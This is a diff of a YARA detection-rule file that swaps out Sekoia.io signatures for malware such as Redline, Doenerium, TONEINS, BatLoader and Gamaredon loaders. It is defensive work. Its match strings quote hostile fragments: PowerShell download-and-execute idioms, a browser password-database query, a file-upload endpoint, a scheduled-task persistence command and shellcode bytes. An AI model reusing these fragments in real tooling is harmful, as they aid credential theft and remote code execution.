-		$ps1 = /new-item -path \$[a-zA-Z0-9_]* -itemtype registrykey -force;/
-		$ps2 = /set-item -path \$[a-zA-Z0-9_]* -value \$[a-zA-Z0-9_]*;/
-		$str0 = "[IO.File]::WriteAllText($" ascii
-		$str1 = "CreateShortcut($env:appdata+" ascii
-		$str2 = "Registry::HKEY_CURRENT_USER\\Software\\Classes\\" ascii
-		$str3 = "New-Object System.Security.Cryptography.AesCryptoServiceProvider" ascii
-		$str4 = "[Convert]::FromBase64String([IO.File]::ReadAllText(" ascii
+		$ = ".CREatesHoRTCUt(" nocase ascii wide
+		$ = "cOPY-Item $enV:UsErprOfilE" nocase ascii wide
+		$ = "-dEsTInaTioN $Env:" nocase ascii wide
+		$ = " = GET-ChilDITem $drivE.nAMe" nocase ascii wide
+		$ = "STArt-SLEeP" nocase ascii wide
+		$ = "-eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy" nocase ascii wide
+		$ = "drIvETYPe='2'" nocase ascii wide
+		$ = ".iConloCaTiON = " nocase ascii wide
 
 	condition:
-		$fun at 0 and 1 of ( $ps* ) and 2 of ( $str* )
+		7 of them
 }
-rule SEKOIA_Apt_Polonium_Megacreep_Strings : FILE
+rule SEKOIA_Apt_Luckymouse_Rshell_Strings_All_Platform : FILE
 {
 	meta:
-		description = "Tries to detect POLONIUM's MegaCreep implant"
+		description = "Detects LuckyMouse RShell Mach-O implant"
 		author = "Sekoia.io"
-		id = "4d62d5bc-2ec9-58ef-bfe7-c0b04fa73b6f"
-		date = "2022-10-12"
+		id = "e79a5ee1-96b3-4643-ab11-0b1095e96488"
+		date = "2022-08-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_polonium_megacreep_strings.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f4881e15854b082d8e6b8a28a7eb1518c559577b1b3ce76e404d67b1fe723fde"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_luckymouse_rshell_strings_all_platform.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ef923b6633a2b7dfa645a31c7c2d0e00872ebad6ec7748568c2b306c29b6b29b"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		orig_id = "927c5fd6-0574-43bf-8db9-6ecc328estrin56c7"
 
 	strings:
-		$ = "[#!#]" ascii wide
-		$ = "[$$%$$]" ascii wide
-		$ = ".e##x##e" ascii wide
-		$ = "WHLib.dll" ascii wide
-		$ = "TestService.txt" ascii wide
-		$ = "X = Stop" ascii wide
-		$ = "Sess.dll" ascii wide
-		$ = "filepathOnTarget" ascii wide
-		$ = "FileNameOnMega" ascii wide
-		$ = "Missing Parameter.. Format of command:" ascii wide
-		$ = "Your Old K##E##Y is Wronge" ascii wide
-		$ = "Your Upgrage Is Success" ascii wide
+		$ = { 6C 6F 67 69 6E 00 68 6F
+        73 74 6E 61 6D 65 00 6C
+        61 6E 00 75 73 65 72 6E
+        61 6D 65 00 76 65 72 73
+        69 6F 6E }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and 3 of them
+		filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Vbs_Downloader : FILE
+
+rule SEKOIA_Apt_Mustang_Panda_Toneins : FILE
 {
 	meta:
-		description = "Detects small VBS loader"
+		description = "Detect the TONEINS implant used by Mustang Panda"
 		author = "Sekoia.io"
-		id = "13b63570-2f18-4b35-8087-9ab15c58a0d1"
-		date = "2023-02-08"
+		id = "f178217a-ff28-4dd7-9395-f19f3e2e934c"
+		date = "2022-11-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_vbs_downloader.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e3ae516ea18f2912b7f0fb7864542ae609167fb29751b87cbf6f9cd34ec858ba"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustang_panda_toneins.yar#L4-L44"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b71932f16ffb1d8d1780b6f9b4db2f0c98d1c770829a4d2284e78c19d37e54bb"
 		score = 75
-		quality = 68
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "on error resume next" nocase ascii wide
-		$s2 = "String('http" nocase ascii wide
-		$s3 = "send()" nocase ascii wide
-		$s4 = ")|Invoke-Expression" nocase ascii wide
-		$s5 = "'); Invoke-Expression $" nocase ascii wide
-		$s6 = "');Invoke-Expression $" nocase ascii wide
+		$rtti1 = ".?AVDNameNode@@"
+		$rtti2 = ".?AVcharNode@@"
+		$rtti3 = ".?AVpcharNode@@"
+		$rtti4 = ".?AVpDNameNode@@"
+		$rtti5 = ".?AVDNameStatusNode@@"
+		$rtti6 = ".?AVpairNode@@"
+		$s1 = "DefWindowProcW1222_test" wide ascii
+		$s2 = "schtasks /create /sc minute /mo 2 /tn" wide ascii
+		$fnv_CreateFile = {CE C9 CA BD}
+		$fnv_GetFileSize = {18 81 ED 44}
+		$fnv_ReadFile = {43 C9 FC 54}
+		$fnv_CloseHandle = {65 00 BA FA}
+		$fnv_WriteFile = {4A C4 07 7F}
+		$fnv_CreateEventA = {E2 DD D2 F9}
+		$fnv_TerminateProcess = {59 EE 4E F8}
+		$fnv_GetCurrentProcess = {45 A8 D8 6D}
+		$fnv_CreateProcessA = { 09 0A 7C 4A}
 
 	condition:
-		$s1 and ( $s2 or $s3 ) and ( $s4 or $s5 or $s6 ) and filesize < 1KB
+		uint16be( 0 ) == 0x4d5a and 4 of ( $rtti* ) and filesize < 8MB and ( for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "69f400d3ff4679294e63fb8a8ca97dbb" ) or ( all of ( $s* ) and 5 of ( $fnv* ) ) )
 }
-rule SEKOIA_Loader_Win_Batloader_Scripts : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_4 : FILE
 {
 	meta:
-		description = "Finds BatLoader samples based on the specific download URL"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "31a04ad3-74f8-4aa5-b3fc-df792bdc71b5"
-		date = "2022-11-30"
+		id = "b8327436-3f3d-441c-86b7-35cd30144dc2"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_batloader_scripts.yar#L1-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "aab6c7780bbc7bed8994b4e70129107bb7b719642fae92b1d3f9146eb11efabc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_4.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ee67eb7b51ff6f3882c6b3ad86c3581396ba02f616c29a0190d0a2ad3d2ea614"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$url = /https?:\/\/[^\s]{15,35}\/index\/[^\s]{1,40}servername=msi/ ascii wide
-		$str00 = "Invoke-WebRequest" ascii wide
-		$str01 = "PSScriptRoot" ascii wide
-		$str02 = "Add-MpPreference" ascii wide
-		$str03 = "Install-GnuPG" ascii wide
-		$str04 = "wmic computersystem get domain" ascii wide
-		$str05 = "ArpInfo" ascii wide
-		$str06 = "$script:List_ProccesCheck" ascii wide
-		$str07 = "Get-Process -Name" ascii wide
-		$str08 = "f001_SetProcessList" ascii wide
-		$str09 = "var WshShell" ascii wide
-		$str10 = "WScript.Sleep" ascii wide
-		$str11 = "WshShell.Run" ascii wide
-		$str12 = "powershell Invoke-WebRequest" ascii wide
-		$str13 = "-nop -w hidden " ascii wide
+		$ = "Function RC4(byteMessage, strKey)"
+		$ = "Set EL = DM.createElement("
+		$ = "decodeBase64 = EL.NodeTypedValue"
+		$ = "Execute plain"
 
 	condition:
-		$url and 2 of ( $str* ) and filesize < 50KB
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Crime_Sload_Vbs_Wsf_Downloader : FILE
+rule SEKOIA_Infostealer_Win_Doenerium_Str : FILE
 {
 	meta:
-		description = "Detects sLoad Downloader"
+		description = "Detect the Doenerium infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "55d87205-5f8f-479a-a616-bf3fce571f03"
-		date = "2022-08-01"
+		id = "1645a86f-1063-4e98-a1fa-85fc8c4e9691"
+		date = "2022-09-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crime_sload_vbs_wsf_downloader.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bd6a9112edb01544463aa7112432ad49360221e89a9ac15d5e8f6731b2b8780a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_doenerium_str.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9bc28d89ad2654c33f2ecd9736f5fb3a10dfc68dfef44ece6e628f5bb8db0800"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 53 65 74 20 6c 69 6e 6b 20 3d 20 [5-10] 2e 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 28 }
-		$ = { 2e 72 75 6e 20 22 63 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 44 6f 63 75 6d 65 6e 74 73 5c [5-10] 2e 6c 6e 6b 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c }
-		$ = { 3d 22 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 20 22 }
-		$ = { 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 20 22 20 26 20 }
+		$str01 = "doenerium" ascii
+		$str02 = "<================[   User Info   ]>================>" ascii
+		$str03 = "<================[WiFi connections]>================>" ascii
+		$str04 = "<================[Executable Info]>================>" ascii
+		$str05 = "<================[ Network Data ]>================>" ascii
+		$str06 = "\\Network Data.txt" ascii
+		$str07 = "\\Update.exe\" --processStart" ascii
+		$str09 = "\\WiFi Connections.txt" ascii
+		$str10 = "\\User Info.txt" ascii
+		$str11 = "\\Executable Info.txt" ascii
+		$str12 = "\\Found Wallets.txt" ascii
+		$str13 = "SELECT origin_url, username_value, password_value FROM logins" ascii
+		$str14 = "https://cdn.discordapp.com/embed/avatars/0.png" ascii
+		$str15 = "detectClipboard" ascii
+		$str16 = ".gofile.io/uploadFile" ascii
 
 	condition:
-		2 of them and filesize < 1KB
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-
-rule SEKOIA_Infostealer_Win_Irontiger_Chrome_Stealer : FILE
+rule SEKOIA_Malware_Valleyrat_Downloader_Strings : FILE
 {
 	meta:
-		description = "Detect the chrome_stealer malware"
+		description = "Detects ValleyRat downloader"
 		author = "Sekoia.io"
-		id = "8c5c3ed0-e1ea-4079-b330-ace8724bff2a"
-		date = "2023-03-01"
+		id = "12985f34-f894-402b-80d1-5d6b2486d730"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_irontiger_chrome_stealer.yar#L3-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dfddebf9623661508e993541106d4dcbb2270b311b2902567bd309810aff58dd"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_valleyrat_downloader_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "321683ac5bdec626cf140cb50507fb03aea2a32635eb6cec884a3fa43c1a9d91"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247532,37 +248037,26 @@ rule SEKOIA_Infostealer_Win_Irontiger_Chrome_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "passwords.txt"
-		$ = "CryptUnprotectData: 0x%08x"
-		$ = "cookies.txt"
-		$ = "decrypt to %s"
-		$ = ".\\chromedb_tmp" wide ascii
-		$ = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS;"
-		$ = "decrypt successful!"
-		$ = "url: %s"
-		$ = "user: %s"
-		$ = "pass: %s"
-		$ = "aes key:"
-		$ = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide
-		$ = "password file %s" wide
-		$ = "cookies file %s" wide
-		$ = "keyfile: %s" wide
+		$ = { 43 00 3a 00 5c [0-30]
+        5c 00 4e 00 54 00 55
+        00 53 00 45 00 52 00
+        2e 00 44 00 58 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and all of them ) or pe.imphash ( ) == "e862f5a6671f9dbd6f53d3d557e568f0"
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and all of them
 }
-rule SEKOIA_Shell_Win_Danfuan : FILE
+rule SEKOIA_Infostealer_Win_Solarmarker_Dll : FILE
 {
 	meta:
-		description = "Detect the Danfuan malware"
+		description = "Finds SolarMarker DLL based on characteristic strings"
 		author = "Sekoia.io"
-		id = "d1cf9988-270b-4a22-bdd5-f40b625715a8"
-		date = "2022-11-04"
+		id = "a2fe7f09-7134-4054-ba40-5ea66785a26c"
+		date = "2022-12-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/shell_win_danfuan.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "96929ef478a8773022233a4092b3c157867aae6ee185568a6327d033c05a68f1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_solarmarker_dll.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5be0a95adb7e486cdec5f0e8433afed41516fc1a990e1d1ba00db7e8fb32dbbb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247570,102 +248064,141 @@ rule SEKOIA_Shell_Win_Danfuan : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<%@ WebHandler Language=\"C#\" class=\"DynamicCodeCompiler\"%>"
-		$ = "CompilerResults compilerResults = compiler.CompileAssemblyFromSource(comPara, SourceText(txt))"
-		$ = "MethodInfo objMifo = objInstance.GetType().GetMethod("
+		$zka = "zkabsr" wide
+		$str0 = "set_PersistKeyInCsp" ascii
+		$str1 = "get_IV" ascii
+		$str2 = "get_MachineName" ascii
+		$str3 = "get_Current" ascii
+		$str4 = "ps_script" ascii
+		$str5 = "request_data" ascii
+		$str6 = "WindowsBuiltInRole" ascii
+		$str7 = "DllImportAttribute" ascii
+		$str8 = "get_BlockSize" ascii
+		$str9 = "GetRequestStream" ascii
 
 	condition:
-		filesize < 15KB and all of them
+		uint16( 0 ) == 0x5A4D and ( ( $zka and 3 of ( $str* ) ) or ( all of ( $str* ) ) ) and filesize < 1MB
 }
-
-rule SEKOIA_Backdoor_Win_Nukesped_Andariel
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc : FILE
 {
 	meta:
-		description = "Detect the NukeSped variant type 1 used by Andariel in October 2023"
+		description = "Detects some suspected APT28 document"
 		author = "Sekoia.io"
-		id = "a3601f0b-5782-4546-ac22-8a0514791f8f"
-		date = "2023-11-27"
+		id = "2b9d597a-a6cd-49df-8938-7103342a1d06"
+		date = "2024-07-25"
 		modified = "2024-12-19"
-		reference = "https://asec.ahnlab.com/en/59073/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_nukesped_andariel.yar#L4-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d6421f3d0a3059e4104cfdceebb237269592f8ace7cc8d5bd613d239e4c010f4"
-		score = 75
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_susp_apt28_uac0063_malicious_doc.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "93322be0785556e627d2b09832c18e39c115e6a6fbff64b1e590e1ddcf8f6a43"
+		logic_hash = "27aeadbb76dd4e670a85e8fcd1e885b69845537dd937aacc1808902e75008848"
+		score = 65
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "Sub pop() : : End Sub" ascii fullword
+		$ = "%localappdata%\\Temp" ascii fullword
+		$ = "rthedbv" ascii fullword
+
 	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "4ce43c7e358e3951f4c4ebd050d570786cbb473ee353974fc7414e3d753da9f6" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "355485cbe2bec406d60a48d7d8d25c71d9ded3c508c87273d936a92b94720d9b" )
+		2 of them and filesize < 1MB
 }
-rule SEKOIA_Exploit_Win_Cloudatlas_Cve_2018_0798 : CVE_2018_0798 FILE
+
+rule SEKOIA_Loader_Win_Svcready_Imports : FILE
 {
 	meta:
-		description = "Detect RTF files used by CloudAtlas to exploit CVE-2018-0798"
+		description = "Finds samples of the SVCReady loader"
 		author = "Sekoia.io"
-		id = "fcff4bc7-fe88-4546-bb5b-f2a1c2f8b0a5"
-		date = "2022-11-15"
+		id = "e89aa736-acee-4881-b367-a9abfe9784ec"
+		date = "2022-06-08"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_win_cloudatlas_cve_2018_0798.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1ed1009d77835f60834c20e61158b00ce7416ade8aa86c3314f4d8d1f6742fa0"
+		reference = "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_svcready_imports.yar#L3-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f210c5363d19dbc822b8476f8ecfd86184af8f1c36819a6c868f171152e7cb74"
 		score = 75
 		quality = 80
-		tags = "CVE-2018-0798, FILE"
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "c2064c7f4826c46bc609c472597366fd"
-		hash2 = "e2281402c63d4b544b81678250d24e61"
-		hash3 = "a97fa135d7e42886bcfdacca0d96c047"
 
 	strings:
-		$ = "6060606061616161616161616161616161616161" ascii nocase
-		$ = "FB0B00004bE8FFFFFFFFC35F83C71B33C966B908" ascii nocase
-		$ = "010f0d00ddd8d97424f4668137" ascii nocase
+		$str0 = "Svc:RunPEDllNative" ascii
+		$str1 = "RunPEDllNative::" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7b5c7274 and all of them
+		uint16( 0 ) == 0x5A4D and filesize > 200KB and filesize < 2MB and pe.imports ( "GDI32.dll" , "Ellipse" ) and pe.imports ( "GDI32.dll" , "SelectObject" ) and pe.imports ( "GDI32.dll" , "GetStockObject" ) and pe.imports ( "GDI32.dll" ) == 3 and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Doc_External_Template : FILE
+rule SEKOIA_Infostealer_Win_Redline_Strings : FILE
 {
 	meta:
-		description = "Detects malicious templates used by Gamaredon"
+		description = "Finds Redline samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "5f6bbf92-2fdf-428d-af49-2d3e754c29d7"
-		date = "2023-01-23"
+		id = "0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e"
+		date = "2022-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_doc_external_template.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "51412081fa7e62fa342b0ed6da18009b39e3952286f2bd319fbe10e0b1761e02"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_redline_strings.yar#L1-L47"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "44443e16b788231b3f256b4d1e91c458c33963d5737d69fc5850f6b0efa7726b"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "USERPROFILE" ascii
-		$ = "msxml2" ascii
-		$ = "T24gRXJyb3IgUmVzdW1lIE5leHQ" ascii
+		$gen01 = "ChromeGetRoamingName" ascii
+		$gen02 = "ChromeGetLocalName" ascii
+		$gen03 = "get_UserDomainName" ascii
+		$gen04 = "get_encrypted_key" ascii
+		$gen05 = "browserPaths" ascii
+		$gen06 = "GetBrowsers" ascii
+		$gen07 = "get_InstalledInputLanguages" ascii
+		$gen08 = "BCRYPT_INIT_AUTH_MODE_INFO_VERSION" ascii
+		$spe0 = "Profile_encrypted_value" wide
+		$spe1 = "[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}" wide
+		$spe2 = "AFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct" wide
+		$spe3 = "OpHandlerenVPHandlerN ConHandlernect%DSK_23%Opera GXcookies" wide
+		$spe4 = "//settinString.Removeg[@name=\\PasswString.Removeord\\]/valuString.RemoveeROOT\\SecurityCenter" wide
+		$spe5 = "ROOT\\SecurityCenter2Web DataSteamPath" wide
+		$spe6 = "windows-1251, CommandLine:" wide
+		$spe7 = "OFileInfopeFileInfora GFileInfoX StabFileInfole" wide
+		$spe8 = "ApGenericpDaGenericta\\RGenericoamiGenericng\\" wide
+		$spe9 = "*wallet*" wide
+		$typ01 = "359A00EF6C789FD4C18644F56C5D3F97453FFF20" ascii
+		$typ02 = "F413CEA9BAA458730567FE47F57CC3C94DDF63C0" ascii
+		$typ03 = "A937C899247696B6565665BE3BD09607F49A2042" ascii
+		$typ04 = "D67333042BFFC20116BF01BC556566EC76C6F7E2" ascii
+		$typ05 = "4E3D7F188A5F5102BEC5B820632BBAEC26839E63" ascii
+		$typ06 = "FB10FF1AD09FE8F5CA3A85B06BC96596AF83B350" ascii
+		$typ07 = "77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60" ascii
+		$typ08 = "A8F9B62160DF085B926D5ED70E2B0F6C95A25280" ascii
+		$typ09 = "718D1294A5C2D3F3D70E09F2F473155C4F567201" ascii
+		$typ10 = "2FBDC611D3D91C142C969071EA8A7D3D10FF6301" ascii
+		$typ11 = "2A19BFD7333718195216588A698752C517111B02" ascii
+		$typ12 = "EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2" ascii
+		$typ13 = "04EC68A0FC7D9B6A255684F330C28A4DCAB91F13" ascii
 
 	condition:
-		uint32be( 0 ) == 0xd0cf11e0 and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5A4D and ( 7 of ( $gen* ) or 3 of ( $spe* ) or 2 of ( $typ* ) )
 }
-rule SEKOIA_Backdoor_Blueshell : FILE
+rule SEKOIA_Unk_Quad7_Netd_Strings : FILE
 {
 	meta:
-		description = "Detects BlueShell backdoor"
+		description = "Matches netd binary"
 		author = "Sekoia.io"
-		id = "8f1cd966-c4d8-44f9-8cd5-4f5277332546"
-		date = "2023-09-08"
+		id = "3f527f0e-c101-4356-9024-fc61aea644d1"
+		date = "2024-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_blueshell.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "348ae383f2aaef544951641dd7e2879afa23e37bdf429c6255254115bd3e10d5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/unk_quad7_netd_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "cdb37db4543dde5ca2bd98a43699828f"
+		logic_hash = "abd59c5fa0c4c73a2cd9a2263d5573d896c6c0d71d96bd59167b1e2d7fbf108e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247673,105 +248206,77 @@ rule SEKOIA_Backdoor_Blueshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "BlueShell" ascii
-		$s2 = "client.go" ascii
-		$s3 = "server ip" ascii
-		$s4 = "server port" ascii
-		$s5 = "reconnect wait time" ascii
-		$s6 = "shell" ascii
-		$s7 = "socks" ascii
-		$s8 = "socks5" ascii
-		$s9 = "GetInteractiveShell" ascii
+		$ = "./netd.dat"
+		$ = "./sys.dat"
+		$ = "--conf"
+		$ = "--init"
+		$ = "--nobg"
+		$ = "Url is NULL."
 
 	condition:
-		filesize < 11MB and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 4 of them
 }
 
-rule SEKOIA_Apt_Darkpink_Loader_Decryptionroutine : FILE
+rule SEKOIA_Downloader_Win_Apt33_Tickler : FILE
 {
 	meta:
-		description = "Detects decryption routine of dark pink loader"
+		description = "Detect the downloader used by APT33 to diwnload Tickler"
 		author = "Sekoia.io"
-		id = "fefc7b2f-eecc-49dc-84bc-24c45e9ea8f0"
-		date = "2023-01-17"
+		id = "e1f704d6-d527-479a-8311-d286c06768ac"
+		date = "2024-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_darkpink_loader_decryptionroutine.yar#L4-L49"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fe2726b77c293fc2aa19216025cfa2b4cd0c5194730cbc57a1fcceb6f6198977"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_win_apt33_tickler.yar#L4-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e6fff291b73812e5a999fbc566e8f7181dcdf01b849a9664ba05fe0a2bc982fe"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hashs = "3f38860d0f6f0ff1b65219379f8793383cba85b11de1c853192fb2d2ba99e481"
-		hashs = "b3f1d6366ebc184f634a240c838b39d729c28b8718b0b9ca6be988a7e446ec42"
-
-	strings:
-		$chunk_1 = {
-        8A 08
-        40
-        84 C9
